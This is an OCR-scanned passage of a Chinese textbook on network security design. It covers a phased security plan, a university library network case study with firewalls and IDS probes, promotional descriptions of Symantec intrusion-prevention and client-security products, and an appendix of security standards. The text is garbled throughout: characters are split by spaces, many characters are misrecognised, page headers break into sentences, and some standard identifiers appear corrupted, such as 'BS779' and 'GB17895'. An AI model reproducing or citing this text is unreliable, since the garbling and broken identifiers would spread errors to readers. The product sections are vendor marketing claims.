1. 第 一 阶段 
(1) 技术 方面 : 采用 防火 墙 、 网 络 防 病毒 软件 、 页 面 防 自 改 系统 来 建立 一 个 结构 上 较 完 


网 络 安 全 方案 变 计 


基于 案例 的 网 络 安 会 技术 与 实践 


善 的 网 络 系统 。 

(2) 服务 方面 : 进行 网 络 拓扑 分 析 、 建 立 中 心机 房管 理 制 度 、 建 立 操作 系统 以 及 防 病毒 
软件 定期 升级 机 制 . 对 重要 服务 器 的 访问 日 志 进 行 备份 ,通过 这 些 服务 ,增强 网 络 的 抗 干 
扰 性 。 

(3) 支持 方面 : 要 求 服务 商 提供 故障 排除 服务 ,以 提高 网 络 的 可 靠 性 ,降低 网 络 故障 对 
网 络 的 整体 影响 。 

2. 第 二 阶段 

在 第 一 阶段 安全 建设 的 基础 上 ,进一步 增加 网 络 安 全 设备 ,采纳 新 的 安全 服务 和 技术 支 
持 来 增强 网 络 的 可 用 性 。 

(1) 技术 方面 : 采用 入 侵 检 测 .邮件 防 病毒 软件 动态 口令 认证 系统 、 在 重要 客户 端 安 
装 个 人 版 防护 软件 。 

(2) 服务 方面 : 对 服务 器 进行 定期 扫描 与 加 固 、 对 防火 墙 日 志 进 行 备份 与 分 析 、 对 入 侵 
检测 设备 的 日 志 进 行 备份 ,建立 设备 备份 系统 以 及 文件 备份 系统 。 

(3) 支持 方面 : 要 求 服务 商 提 供 灾难 恢复 、 实 时 日 志 检 索 、 实 时 查 杀 病毒 、 实 时 网 络 监 
控 等 技术 支持 。 

3. 第 三 阶段 

在 这 一 阶段 ,采取 的 措施 以 进一步 提高 网 络 效率 为 主 。 

(1) 技术 方面 : 采用 反 垃 圾 邮件 系统 、 网 络 管理 软件 .QoS 流量 管理 软件 。 

(2) 服务 方面 : 采用 白 客 渗透 测试 ,要 求 服务 商定 期 提供 整体 安全 分 析 报 告 。 

(3) 支持 方面 : 要 求 能 够 实时 或 者 在 攻击 发 生 后 查找 攻击 源 。 

以 上 针对 用 户 网 络 分 别 从 3 个 方面 提出 了 安全 解决 方案 ,并 按照 实施 的 紧迫 性 分 成 3 
个 阶段 来 实现 ,但 是 实际 针对 某 个 用 户 , 对 于 安全 的 要 求 可 能 各 不 相同 ,具体 网 络 情况 也 可 
能 有 很 大 的 差异 ,因此 建议 用 户 根据 实际 情况 建立 网 络 安全 建设 的 时 间 表 。 

另外 , 随 着 新 技术 、 新 产品 的 不 断 涌现 ,网 络 技术 的 不 断 发 展 ,对 于 网 络 安全 的 要 求 不 断 
提高 ,实际 中 ,实施 过 程 采 取 的 措施 完全 可 能 超越 本 书 中 提 及 的 产品 .服务 .支持 ,这 也 反映 
网 络 安全 建设 中 的 最 基本 原则 : 不 断 改进 ,不 断 增强 ,安全 无 止境 。 


17.2 某 高 校 图 书馆 的 网 络 安全 方案 


17.2.1 拓扑 简要 介绍 


(1) 整个 网 络 边界 有 两 条 链 路 ,一 条 为 教育 网 100Mbps 链 路 ,一 条 为 中 国电 信 的 
10Mbps ADSL。 在 每 条 链 路 之 前 放置 独立 的 防火 墙 设备 。 对 入 站 和 出 站 进行 访问 控制 。 

(2) 两 条 链 路 汇聚 到 中 心路 由 器 上 ,通过 NAT 地 址 转换 ,进入 校园 内 部 网 的 中 心 交 换 
机 ,在 其 间 部 署 一 套 人 侵 检测 系统 IDS 的 检测 探 点 。 对 进入 内 部 网 络 的 流量 与 内 容 进 行人 
侵 检 测 与 判断 。 

(3) 中 心 交换 机 分 出 3 条 主干 内 部 链 路 ,一 条 直接 接 入 校园 内 部 网 的 服务 器 群 ,包括 邮 
件 服务 器 Web 服务 器 、 防 病毒 中 央 服 务 器 等 。 其 中 防 病毒 服务 器 将 通过 该 链 路 ,监控 与 管 
理 内 部 网 络 的 所 有 防 病毒 客户 端 节点 。 并 且 分 发 病毒 定义 码 和 客户 端 防 病毒 防御 策略 , 收 


集 客户 端的 病毒 信息 ,集中 处 理 与 汇总 病毒 备份 文件 ,病毒 样本 放置 于 服务 器 的 中 央 隔 
离 区 。 

在 中 心 交 换 机 与 服务 器 区 之 间 放 置 一 个 人 侵 检测 系统 IDS 的 检测 探 点 ,从 而 保证 关键 
应 用 的 安全 性 与 可 靠 性 。 并 且 在 邮件 服务 器 网 段 中 部 署 反 垃 圾 邮件 防火 墙 设备 。 

(4) 从 中 心 交换 机 到 二 层 会 聚 的 包括 教工 区 、 学 生 区 等 区 域 。 在 二 层 汇 聚 中 心 部 署 一 
个 人 侵 检测 系统 IDS 检测 探 点 ,用 于 检测 区 域内 的 入 侵 检 测 行为 。 

(5) 最 后 一 条 链 路 部 署 和 人 侵 检测 系统 IDS 检测 探 点 ,保证 其 他 应 用 服务 器 的 网 络 安全 。 


17.2.2 方案 设备 选 型 


1. 人 侵 检测 系统 : Symantec SNS 7120 

1) 产品 简介 

(1) Symantec Network Security 系列 设备 提供 了 实时 主动 的 网 络 人 侵 防 御 ,可 以 保护 
关键 的 企业 资产 。 富 于 创新 的 入 侵 防 范 统一 网 络 引 擎 (IMUNE) 是 协议 异常 特征 、 统 计 和 
漏洞 攻击 拦截 技术 的 完美 结合 , 它 可 以 精确 地 识别 并 禁止 已 知 、 未 知 (或 零 日 ) 攻 击 和 病毒 在 
网 络 中 传播 。 

(2) LiveUpdate 技术 可 以 自动 更 新 防护 策略 技术 ,以 帮助 企业 及 早 应 对 各 种 不 断 变化 
的 威胁 。 将 赛 门 铁 克 安 全 响应 中 心 和 赛 门 铁 克 DeepSight 预警 服务 的 专业 知识 ,与 易于 理 
解 的 安全 指导 原则 结合 在 一 起 ,从 而 可 更 快速 的 响应 安全 事件 。 借 助 全 面 的 策略 管理 功能 ， 
企业 可 以 轻松 地 构建 .评估 并 报告 最 佳 企 业 实践 。 

(3) 只 需 简单 的 鼠标 单 击 即 可 将 设备 从 检测 状态 转换 到 防御 状态 ,使 企业 可 以 轻松 地 
切换 部 署 模式 。 灵 活 的 人 侵 防 御 部 署 选项 ,包括 支持 多 串联 对 或 在 同一 设备 上 监视 被 动 和 
串联 部 分 ,使 不 断 发 展 的 网 络 适应 各 种 安全 策略 。 

(4) Symantec Network Security 系列 是 通过 Symantec Network Security Management 
Console 集中 管理 的 ,Symantec Network Security Management Console 是 一 个 可 伸缩 的 安 
全 管理 系统 ,支持 大 型 分 布 式 企 业 部 署 ,并 提供 全 面 的 配置 和 策略 管理 、 实 时 威胁 分 析 、 企 业 
报告 和 灵活 的 显示 。 

(5) 该 系列 提供 了 3 种 型 号 ,可 以 很 好 地 满足 企业 的 各 种 部 署 需求 ,无 论 在 分 支 机 构 、 
分 布 式 站 点 还 是 网 络 核心 或 主体 上 部 署 网 络 安全 。 这 种 高 度 可 伸缩 的 一 流 设备 支持 从 
50Mbps 一 2Gbps 的 总 网 络 带宽 ,最 多 可 涉及 8 个 网 段 。 

2) 主要 特性 

(1) 增强 现 有 网 关 和 服务 器 安全 部 署 ,阻止 威胁 在 网 络 中 传播 。 

(2) 在 IMUNE 架构 中 综合 了 多 种 检测 技术 ,包括 协议 异常 检测 和 漏洞 攻击 拦截 ,可 准 
确 地 识别 和 禁止 已 知 /未 知 (或 “ 零 日 ”攻击 与 蠕虫 。 

(3) 帮助 企业 构建 .权衡 和 报告 企业 最 佳 实践 和 法 规 一 致 性 计划 。 

(4) 集成 了 赛 门 铁 克 安全 响应 中 心 和 赛 门 铁 克 DeepSight 预警 服务 的 专业 知识 ,提供 
有 关 威 胁 的 早期 知识 ,以 实现 主动 安全 。 

(5) 在 网 络 中 不 可 见 , 因 此 不 需要 重新 配置 网 络 ,简化 了 部 署 过 程 。 

(6) 这 些 设 备 最 多 可 支持 8 个 接口 ,允许 企业 监视 更 多 的 网 段 。 

(7) 3 种 型 号 支持 从 50Mbps 一 2Gbps 的 总 网 络 带宽 ,可 满足 分 支 机 构 、 分 布 式 站 点 和 


网 络 安 全 方 笑 说 计 
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网 络 核心 的 不 同 部 署 需求 。 

(8) 使 用 LiveUpdate 技术 更 新 防护 策略 以 实现 自动 防护 ,帮助 企业 及 早 应 对 各 种 不 断 
变化 的 威胁 。 

(9) 单 击 防御 一 一 只 需 简 单 的 鼠标 单 击 即 可 从 检测 状态 转换 到 防御 状态 。 

3) 技术 亮点 

Symantec NetworkSecurity 系列 是 新 一 代 的 网 络 安全 产品 ,SNS 同时 具备 IPS( 入 侵 防 
御 ) 和 IDS( 入 侵 检 测 ) 两 项 功能 。 作 为 成 熟 的 IPS 产品 , 它 具 有 很 多 传统 网 络 安全 产品 所 缺 
乏 的 功能 。 

(1) 主动 防御 ,而 非 被 动 报警 。 

目前 网 络 安全 事件 发 生 的 频率 越 来 越 高 ,给 用 户 带 来 的 损失 也 越 来 越 大 。 传 统 的 安全 
产品 ,需要 用 户 花费 大 量 时 间 和 精力 ,实时 跟踪 当前 的 计算 机 安全 漏洞 。 然 后 修改 网 络 中 各 
种 安全 产品 的 安全 策略 ,实现 对 网 络 攻 击 的 有 效 防御 。 但 是 随 着 网 络 边界 模糊 .用 户 系统 的 
多 样 化 ,这 样 的 努力 无 法 达到 用 户 的 期 望 效果 。 

SNS 是 可 以 实现 自动 防御 的 网 络 安 全 产品 ,无 须 人 工 干预 ,自动 检测 屏蔽 网 络 入 侵 行 
为 ,减少 用 户 用 于 日 常 维护 的 人 力 成 本 。SNS 可 以 以 透明 (inline) 方 式 部 署 在 用 户 网 络 中 ， 
不 用 修改 用 户 网 络 结构 ,也 不 用 修改 交换 机 配置 。 配 合 产 品 自 带 的 安全 策略 ,真正 实现 即 插 
即 用 。 

(2) 安全 策略 自动 维护 。 

传统 IDS 产品 被 用 户 所 排斥 的 主要 原因 就 是 需要 用 户 人 工 设 定 检测 策略 ,并 需要 定期 
维护 更 新 。SNS 改变 了 这 种 传统 的 更 新 模式 ,他 可 以 自动 更 新 ,加 载 . 生 效 最 新 的 安全 策 
略 , 大 大 降低 了 产品 对 操作 人 员 的 依赖 。 通 过 这 种 策略 自动 更 新 的 工作 方式 ,帮助 用 户 争 取 
了 在 出 现 可 能 对 系统 和 网 络 造成 严重 影响 的 重大 安全 隐患 的 紧急 状况 下 的 响应 时 间 ( 如 : 
冲击 波 ) ,在 主机 还 没有 来 得 及 完成 补丁 分 发 的 情况 下 ,SNS 通过 自动 化 的 策略 更 新 ,就 已 
经 实现 了 对 整个 网 络 的 安全 防护 。 

(3) 两 级 管理 模式 。 

SNS 为 主 控 台 和 SNS 设备 两 级 管理 模式 ,无须 额外 的 日 志 服 务 器 ,通过 主 控 台 ,可 以 最 
多 同时 对 120 个 SNS 设备 设 定 统一 的 安全 策略 。 多 个 SNS 的 报警 事件 ,也 可 以 在 一 个 主 

台 窗 口内 ,实现 事件 关联 ,帮助 用 户 更 加 准确 ,快速 的 定位 问题 主机 ,或 是 入 侵 者 的 目的 及 

入 侵 途 径 。 

(4) 通过 带宽 许可 方式 购买 ,节约 用 户 购买 成 本 。 

SNS 通过 带宽 许可 的 方式 进行 购买 ,用 户 只 需 按照 所 保护 网 络 的 带宽 流量 支付 费用 ， 
不 必 为 自己 没有 用 到 的 服务 付费 。 这 样 的 方式 ,也 可 以 适应 用 户 不 断 变 化 的 网 络 结构 和 不 
断 接 入 网 络 的 新 的 业务 系统 的 要 求 。 带 宽 许可 可 以 累加 购买 ,保护 用 户 已 有 的 投资 不 会 
浪费 。 

2. 企业 防 病毒 系统 : Symantec Client Security 2.0 

1) 产品 简介 

Symantec ClientSecurity(SCS) 为 客户 端 提 供 集成 的 防 病毒 防火墙 以 及 人 侵 检 测 功 
能 。SCS 已 将 网 络 和 远程 客户 端的 安全 功能 集成 在 一 个 解决 方案 中 。 它 不 存在 互 操作 性 
问题 ,通过 集成 赛 门 铁 克 久 负 盛 誉 的 防 病 毒 、 防 火 墙 和 入 侵 检测 等 技术 为 客户 提供 更 强 的 攻 


击 防护 能 力 ,包括 那些 混合 威胁 在 内 。 来 自 一 个 三 商 的 多 种 集成 化 技术 使 得 协作 管理 和 响 
应 成 为 可 能 ,从 而 增加 了 防护 能 力 , 降 低 了 管理 和 支持 成 本 ,削减 了 整体 购买 成 本 。 

2) 主要 特性 

(1) 全 面 防护 ,高 效 管理 。 

Symantec Client Security 已 将 网 络 和 远程 客户 端的 安全 功能 集成 在 一 个 解决 方案 中 。 
它 不 存在 互 操 作 性 问题 ,通过 集成 赛 门 铁 克 久 负 盛 誉 的 防 病毒 .防火 墙 和 入 侵 检测 等 技术 为 
客户 提供 更 强 的 攻击 防护 能 力 , 包 括 那些 混合 威胁 在 内 。 来 自 一 个 厂商 的 多 种 集成 化 技术 
使 得 协作 管理 和 响应 成 为 可 能 ,从 而 增加 了 防护 能 力 ,降低 了 管理 和 支持 成 本 ,削减 了 整体 
购买 成 本 。 

(2) 集成 安全 管理 。 

通过 赛 门 铁 克 久 经 考验 的 架构 一 一 赛 门 铁 克 系统 中 心 来 实现 集成 安全 管理 ,可 以 提供 
全 面 的 防 病毒 .防火墙 和 入 侵 检测 功能 。 这 就 可 以 提供 先进 的 安全 管理 ,并 且 简 化 了 针对 企 
业 网 络 内 每 个 客户 端 (包括 远程 用 户 ) 复 杂 威 胁 的 安全 管理 过 程 。 通 过 这 种 方法 可 以 优化 管 
理 资源 ,因为 安装 .报告 和 更 新 都 可 以 从 一 个 控制 台 上 来 完成 。 管 理 功能 包括 : 

QO 集成 化 管理 一 一 使 用 赛 门 铁 克 系 统 中 心 ,管理 员 从 单个 控制 台 就 可 以 完全 配置 、. 安 
装 .管理 和 更 新 客户 端 病毒 ,防火墙 以 及 人 侵 检测 功能 。 管 理 员 还 可 以 使 用 赛 门 铁 克 系 统 中 
心 控制 台 来 配置 .部署 和 执行 企业 网 络 策略 。 

@ 逻辑 组 管理 一 一 Symantec Client Security 能 够 创建 和 管理 服务 器 组 中 的 按 逻 辑 划 
分 的 客户 端 和 服务 器 组 。 这 对 于 需要 用 同一 种 方法 管理 相同 功能 实体 的 组 织 来 说 尤为 适 
用 ,可 减少 管理 不 同 客户 端 组 所 需要 的 父 服务 器 数目 。 

(3) 易于 安装 。 

Symantec Packager 能 够 预先 配置 防 病毒 .防火 墙 和 入 侵 检测 的 安装 程序 包 , 从 而 最 大 
化 部 署 灵活 性 ,将 部 署 成 本 降 至 最 低 。 有 3 种 预先 配置 的 部 署 选项 可 用 : 全 面 管理 ,简单 管 
理 和 瘦 客 户 端 。 

(4) 集成 化 响应 。 

Symantec Client Security 可 以 为 防 病毒 .防火墙 以 及 入 侵 检 测 提供 通用 的 部 署 和 更 新 
功能 ,有 助 于 减少 更 新 的 开销 、 风 险 和 管理 。 此 外 ,集成 化 响应 功能 还 能 够 使 企业 对 于 违背 
安全 策略 和 病毒 发 作 更 快 做 出 响应 ,从 而 提高 网 络 的 整体 安全 状态 。 

这 种 集成 化 更 新 和 响应 功能 是 由 赛 门 铁 克 安 全 性 响应 中 心 这 个 世界 领先 的 互联 网 安全 
性 研究 和 支持 组 织 完成 的 。 使 用 赛 门 铁 克 久 负 盛 誉 的 自动 更 新 技术 ,Symantec Client 
Security 可 以 在 可 自动 安装 (如 果 管 理 员 愿意 ,也 可 手动 安装 ) 的 单个 集成 化 的 数据 包 中 发 
送 病毒 定义 码 .防火墙 规 则 以 及 和 人 侵 特征 库 。 在 病毒 发 作 时 , 赛 门 铁 克 通 过 各 种 集成 化 技术 
来 测试 和 检验 其 解决 方案 。 由 于 定义 码 更 新 文件 很 小 .Symantec Client Security 可 以 确保 
带宽 预 留 和 快速 实施 ,从 而 对 网 络 性 能 产生 的 影响 最 小 。 

赛 门 铁 克 安全 响应 中 心 提供 了 一 系列 功能 强大 的 安全 资源 ,包括 世界 一 流 的 产品 支持 
以 及 业界 领先 的 赛 门 铁 克 全 球 研究 和 技术 支持 中 心 提 供 的 无 间断 的 报警 服务 。 赛 门 铁 克 的 
防 入侵 专 家 、 安 全 工程 师 、 防 病毒 专家 协同 工作 ,每 天 24 小 时 持续 不 断 地 研究 病毒 、 恶 意 代 
码 、 不 断 发 展 的 漏洞 以 及 最 新 的 人 侵 技术 。 此 外 , 赛 门 铁 克 安全 响应 中 心 始终 致力 于 开发 自 
动 紧急 事件 响应 系统 ,用 于 检测 安全 问题 、 向 客户 发 出 告警 ,并 为 Symantec Enterprise 


网 经 安全 方案 变 计 


秦 于 案例 的 网 络 安全 技术 与 实践 


Security 客户 提供 安全 的 解决 方案 。 

(5) 有 效 的 保护 。 

Symantec Client Security 融合 了 集成 化 防护 、 久 负 盛 誉 的 技术 以 及 全 面 的 安全 特性 来 
使 管理 员 安心 : 

@ 客户 安全 策略 实施 一 一 根据 防火 墙 规则 扫描 传人 和 传 出 流量 。Symantec Client 
Security 内 的 防火 墙 技术 可 以 同 防 病毒 技术 无 缝 协作 ,保护 客户 端 不 受 病毒 影响 。 即 使 在 
管理 员 或 用 户 将 实时 病毒 防护 停 用 也 可 以 实现 上 述 防护 。 

通过 客户 端 防火 墙 和 人 侵 检测 技术 的 结合 , 它 扫描 并 将 所 有 传人 和 传 出 的 流量 同 已 知 
的 特征 组 相 比较 ,如 果 检 测 到 入 侵 企图 ,可 以 将 一 个 人 侵 IP 地 址 阻塞 超过 30 分 钟 。 

@ 融合 领先 的 技术 一 一 Symantec Client Security 构筑 在 久 负 盛 誉 的 业界 领先 防 病毒 、 
防火 墙 和 入侵 检 测 技术 基础 之 上 。 

数字 免疫 系统 可 以 自动 提交 潜在 威胁 ,并 且 将 应 对 方案 自动 发 送 到 有 问题 的 机 器 或 者 
整个 企业 。 在 包括 硬件 资源 、 架 构 设计 、 最 新 扫描 引擎 以 及 Web crawlers 在 内 的 精密 完善 
的 基础 设施 支持 下 ,数字 免疫 系统 可 以 确保 最 高 的 服务 可 用 性 。 

@ 可 扩展 性 一 一 Symantec Client Security 可 以 提供 快速 响应 和 更 高 的 扩展 性 ,利用 赛 
门 铁 克 技 术 采 用 的 很 小 的 定义 码 文 件 .病毒 定义 码 传输 方法 以 及 病毒 定义 码 的 多 线程 服务 
器 部 署 、 防 火 墙 规则 以 及 和 人 侵 特 征 库 等 特性 ,可 以 保护 客户 端 层 免 受 新 型 威胁 的 侵害 。 

多 点 产品 并 不 提供 全 面 检测 所 需要 的 部 件 。Symantec Client Security 是 唯一 一 种 这 样 
的 单 厂商 解决 方案 ,可 以 真正 集成 多 种 技术 ,提高 客户 机 对 当前 复杂 的 互联 网 威胁 的 防御 
能 力 。 

3) 技术 亮点 

(1) 为 客户 端 提供 更 强 的 防护 ,通过 集成 管理 和 响应 功能 来 防御 互联 网 威胁 。 

(2) 采用 集中 化 安装 .部 署 .管理 和 更 新 的 方法 来 确保 安全 策略 的 实施 。 

(3) 优化 资源 ,有 助 于 降低 网 络 安全 客户 端 防护 的 管理 和 支持 成 本 。 

(4) 隐私 控制 功能 ,可 以 防止 用 户 定义 的 机 密 信 息 在 没 得 到 用 户 认 可 的 情况 下 被 发 送 。 

(5) 通过 快速 更 新 客户 端的 防 病毒 定义 码 、 防 火 墙 规 则 以 及 入 侵 检 测 特 征 来 保留 网 络 
带宽 。 

(6) 通过 提供 预先 配置 防 病毒 防火墙 和 入 侵 检测 安装 程序 包 来 最 大 化 实施 灵活 性 。 

(7) 由 赛 门 铁 克 安全 响应 中 心 一 一 全 球 领 先 的 互联 网 安全 研究 及 响应 机 构 提 供 支持 。 

(8) 此 外 ,还 提供 Symantec Client Security 小 企业 版 ,这 是 专 为 小 型 企业 设计 的 完备 
的 、 购 买 时 就 包括 许可 证 的 解决 方案 。 


17.3 小 结 
本 章 通过 两 个 具体 案例 阐述 了 大 型 网 络 的 网 络 安全 设计 方法 和 利用 软件 防火 墙 对 中 小 


型 局 域 网 进行 安全 保护 的 实施 方法 。 
本 章 内 容 只 具有 参考 意义 ,不 存在 绝对 安全 的 网 络 。 


附 录 


国际 及 国家 网 络 安全 相关 标准 


1. 国际 网 络 安全 相关 标准 

(1) 信息 安全 管理 与 控制 标准 

QO@ 英国 : 信息 安全 管理 体系 标准 (BS779) 

@ 英国 : IT 基础 设施 库 (ITIL) 

@ 美国 : 信息 及 相关 技术 控制 目标 (COBIT) 

@ ISO: IT 安全 管理 指南 (ISO 13335) 

(2) 技术 与 工程 标准 

Q@ 美国 : 信息 安全 橘 皮 书 (TCSEC) 

@ ISO: 信 息 产品 通用 测评 准则 CC(1SO 15408) 

@ 美国 : 系统 安全 工程 能 力 成 熟 度 模型 (SSE-CMM) 

2. 我 国 网 络 安全 相关 标准 

(1) GB17895 一 1999《 计 算 机 信息 系统 安全 保护 等 级 划分 准则 》 

(2) GBT18336 一 2001《 信 息 技 术 安 全 性 评估 准则 》 

(3) GA/T387 一 2002《4 计 算 机 信息 系统 安全 等 级 保护 网 络 技术 要 求 》 
(4) GA/T388 一 2002《 计 算 机 信息 系统 安全 等 级 保护 操作 系统 技术 要 求 》 
(5) GA/T389 一 2002《 计 算 机 信息 系统 安全 等 级 保护 数据 库 管理 系统 技术 要 求 》 
(6) GA/T390 一 2002《 计 算 机 信息 系统 安全 等 级 保护 通用 技术 要 求 》 
(7) GA/T391 一 2002《 计 算 机 信息 系统 安全 等 级 保护 管理 要 求 》 
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